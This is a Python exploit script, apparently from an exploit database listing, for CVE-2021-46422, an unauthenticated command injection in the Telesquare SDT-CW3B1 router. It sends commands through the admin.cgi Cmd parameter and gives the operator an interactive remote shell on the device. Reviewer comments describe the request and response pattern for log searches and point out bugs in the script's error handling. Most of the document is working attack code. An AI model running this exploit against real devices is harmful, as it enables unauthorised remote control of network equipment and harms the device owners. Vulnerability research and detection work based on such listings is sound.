Telesquare SDT-CW3B1 1.1.0 Command Injection

Credit: Bryan Leong
Risk: Medium
Local: No
Remote: Yes

#!/usr/bin/python3

# Exploit Title: Telesquare SDT-CW3B1 1.1.0 - OS Command Injection
# Date: 24th May 2022
# Exploit Author: Bryan Leong <NobodyAtall>
# Vendor Homepage:
# CVE : CVE-2021-46422
# Authentication Required: No
#
# NOTE(review): this listing was collapsed onto one line by extraction; the
# line breaks and indentation below are reconstructed from the syntax.
#
# What the proof of concept shows, for triage and detection:
#   * Every request is an unauthenticated GET over plain HTTP to
#     /cgi-bin/admin.cgi with Command=sysCommand and a Cmd= parameter whose
#     value is the command text.
#   * The device answers with XML; the command output is read from the
#     <CmdResult> element.
# Those two facts (the request path/query and the response element) are what
# web, proxy and IDS logs can be searched for when checking for exposure.

import requests
import argparse
import sys
from xml.etree import ElementTree


def sysArgument():
    """Parse the command line and return the value of the required --host option."""
    ap = argparse.ArgumentParser()
    ap.add_argument("--host", required=True, help="target hostname/IP")
    args = vars(ap.parse_args())
    return args['host']


def checkHost(host):
    """Send one GET to http://<host> and print whether a response came back.

    Only requests.exceptions.Timeout is handled (converted to SystemExit).
    No timeout= is passed to requests.get, and requests applies none by
    default, so that handler is unlikely to fire; other request errors
    (for example a refused connection) propagate as an uncaught exception.
    """
    url = "http://" + host
    print("[*] Checking host is it alive?")
    try:
        # The response object is not inspected; any HTTP status counts as "alive".
        rsl = requests.get(url)
        print("[*] The host is alive.")
    except requests.exceptions.Timeout as err:
        raise SystemExit(err)


def exploit(host):
    """Probe the admin CGI, run `id` through it, then loop on operator input.

    Every path that gives up calls sys.exit(0), so the process exit status
    does not distinguish "not vulnerable" from a clean exit.
    """
    # Endpoint and parameters named in the advisory; the command text is
    # appended verbatim after "Cmd=".
    url = "http://" + host + "/cgi-bin/admin.cgi?Command=sysCommand&Cmd="

    # Presence check: a request with an empty Cmd that returns HTTP 200 is
    # taken to mean the CGI script exists.
    rsl = requests.get(url)

    if(rsl.status_code == 200):
        print("[*] CGI script exist!")
        print("[*] Injecting some shell command.")

        # First test: request the `id` command and collect <CmdResult> text.
        cmd = "id"

        try:
            rsl = requests.get(url + cmd, stream=True)
            # Parse the raw response stream incrementally as XML.
            xmlparser = ElementTree.iterparse(rsl.raw)

            cmdRet = []

            for event, elem in xmlparser:
                if(elem.tag == 'CmdResult'):
                    cmdRet.append(elem.text)
        except:
            # NOTE(review): bare except - a network error or Ctrl-C is reported
            # with the same "no XML" message as a genuine parse failure.
            print("[!] No XML returned from CGI script. Possible not vulnerable to the exploit")
            sys.exit(0)

        if(len(cmdRet) != 0):
            print("[*] There's response from the CGI script!")
            # NOTE(review): elem.text is None for an empty element, in which
            # case .strip() raises AttributeError here.
            print('[*] System ID: ' + cmdRet[0].strip())

            print("[*] Spawning shell. type .exit to exit the shell", end="\n\n")
            # Interactive loop: one HTTP request per line typed; ".exit" quits.
            while(True):
                cmdInput = input("[SDT-CW3B1 Shell]# ")

                if(cmdInput == ".exit"):
                    print("[*] Exiting shell.")
                    sys.exit(0)

                # No try/except here, unlike the first request: request or
                # XML parse errors inside the loop are uncaught.
                rsl = requests.get(url + cmdInput, stream=True)
                xmlparser = ElementTree.iterparse(rsl.raw)

                for event, elem in xmlparser:
                    if(elem.tag == 'CmdResult'):
                        print(elem.text.strip())

                print('\n')

        else:
            # XML parsed but contained no <CmdResult> element.
            print("[!] Something doesn't looks right. Please check the request packet using burpsuite/wireshark/etc.")
            sys.exit(0)

    else:
        # Any status other than 200 on the presence check is treated as
        # "endpoint absent"; the status code is printed for the operator.
        print("[!] CGI script not found.")
        print(rsl.status_code)
        sys.exit(0)


def main():
    """Entry point: read --host, run the reachability check, then exploit()."""
    host = sysArgument()
    checkHost(host)
    exploit(host)


if __name__ == "__main__":
    main()

